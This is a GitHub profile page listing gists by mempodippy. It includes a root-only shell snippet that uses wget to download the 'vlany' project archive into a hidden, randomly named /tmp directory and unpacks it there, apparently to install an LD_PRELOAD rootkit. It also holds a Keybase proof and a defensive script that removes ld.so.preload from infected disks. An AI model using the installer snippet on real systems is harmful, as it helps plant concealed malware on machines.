Skip to content

Instantly share code, notes, and snippets.

View mempodippy's full-sized avatar

blank mempodippy

  • Edinburgh, Scotland
View GitHub Profile
#!/bin/sh
[ $(id -u) != 0 ] && { echo "Not root. Exiting."; exit; }
WORKING_DIR="/tmp/.$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)"
ARCHIVE_NAME="$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1).tar.gz"
mkdir $WORKING_DIR && cd $WORKING_DIR
wget https://github.com/mempodippy/vlany/archive/master.tar.gz -O $ARCHIVE_NAME
tar xvpfz $ARCHIVE_NAME && rm $ARCHIVE_NAME

Keybase proof

I hereby claim:

  • I am mempodippy on github.
  • I am mempodippy (https://keybase.io/mempodippy) on keybase.
  • I have a public key whose fingerprint is AAC6 0B61 AAFD D6BF 2EC8 205F 3F3B 38D8 7CE0 F964

To claim this, I am signing this object:

@mempodippy
mempodippy / preload_kill.sh
Last active January 8, 2017 17:53
Small bash script designed to be run on livecd environments. It mounts potentially infected system disks and then removes ld.so.preload, preserving the preloaded library in a temporary directory in the livecd environment for analysis.
#!/bin/bash
usage ()
{
echo "preload_kill - simple bash script designed for 'livecd' environments."
echo "Removes the ld.so.preload file on infected systems."
echo "Usage: $0 <device name of infected system root disk>"
echo "The partition should have /etc/ present on it."
echo "Example: $0 sda1"
exit